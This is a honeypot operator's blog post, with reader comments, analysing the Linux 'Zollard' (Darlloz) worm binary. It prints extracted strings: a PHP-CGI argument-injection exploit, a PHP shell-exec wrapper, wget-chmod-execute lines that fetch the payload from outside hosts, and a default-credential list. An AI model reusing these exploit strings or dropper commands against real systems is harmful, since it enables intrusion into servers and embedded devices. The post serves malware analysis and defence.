Recently my nepenthes stopped working. Looking into the last log-lines I found a wget-line:
[12112013 06:25:07 debug info fixme] File info submitted (ebee4228eb3443cd8d55228733b8c1c6, http://www.gpharma.co/x86)
So I took a look at this binary, which I could download from this location.
# file x86
x86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Next look: try "strings":
First nothing new... but then I saw:
/proc/self/exe
POST
?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
<?php
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
What the heck..? And who is "zollard"?
#### Update ####
The POST part resolves to:
?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
###############
Further on:
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.solarteure-landkirchen.de/solar/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
Now the binary loads another binary, executes it and starts a webserver?
myshellexec("wget -O /tmp/x86 http://www.solarteure-landkirchen.de/solar/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
A few lines more: it installs "iptables", drops every telnet connection and starts its own telnet daemon:
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
In the end the program destroys its sources (rm -rf) and runs in
mkdir -p
/var/run/.zollard/
The last lines:
chmod +x
cp /bin/sh
1234
12345
dreambox
smcadmin
stemroot
0!0
SHA1
So it ends up with some kind of crypto..
VirusTotal shows a hit rate of 2 out of 47; well, it is no Windows binary...
Anyone seen this before? Who is zollard? Where did the binary get the necessary root credentials from? I guess I have to take a further look...
###
Update
There were quite a lot of download attempts today:
# grep gpharma nepenthes.log | wc -l
33348
which is from the log-lines:
[12112013 09:23:43 debug info fixme] File info submitted (ebee4228eb3443cd8d55228733b8c1c6, http://www.gpharma.co/x86)
[12112013 09:23:43 debug info fixme] File upload requested (ebee4228eb3443cd8d55228733b8c1c6, http://www.gpharma.co/x86)
#### Update 2 ####
I executed the script on a Linux VMware after adding "o+x" rights to the binary.
The iptables lines generate errors:
error inserting … ip_tables.ko – Unknown symbol in module
Immediately the machine starts exchanging traffic with 117.201.16.108:58455
and also starts listening on this port 58455.
Looks like my machine started scanning the IP range 117.201.16.* on that port;
I receive answers from there... No httpd or telnetd daemons are listening in "ps", which I expected.
The command "pstree" shows an httpd, though! Different children are running; the last one has a connection
to 117.201.18.22..23..24.. Looks like the "ps" executable has been changed.
Will see what else can be found. Now it is "St. Martin" time.. :-)
Thank you for pointing that out. Luckily (up to now) the malware only hit my stand-alone honeypot. So this one is the spamming refrigerator.. :-)
best greetings,
scooba
Hi!
I guess you figured that, but that’s the Linux/Darlloz malware.
See http://www.deependresearch.org/2013/12/hey-zollard-leave-my-internet-of-things.html
or
http://www.symantec.com/connect/blogs/linux-worm-targeting-hidden-devices
Did you have any other embedded Linux device connected to your network, like a webcam, home automation, Wii etc.? Might be worth checking them.
Best regards